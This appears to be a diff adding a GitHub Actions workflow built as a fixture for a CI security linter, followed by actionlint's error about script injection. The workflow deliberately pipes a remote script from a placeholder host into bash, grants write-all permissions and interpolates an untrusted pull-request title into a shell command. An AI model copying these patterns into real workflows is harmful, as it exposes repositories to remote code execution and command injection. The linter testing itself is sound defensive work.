.github/workflows/probe.yml

```
@@ -0,0 +1,16 @@
+
+permissions: write-all
+
+jobs:
+  probe:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@main
+      - name: Pipe to shell
+        run: curl -sSL https://example.com/ci.sh | bash
+      - name: Script injection
+        run: echo "${{ github.event.pull_request.title }}"
```

actionlint (1.7.12)

[error] "github.event.pull_request.title" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details

(expression)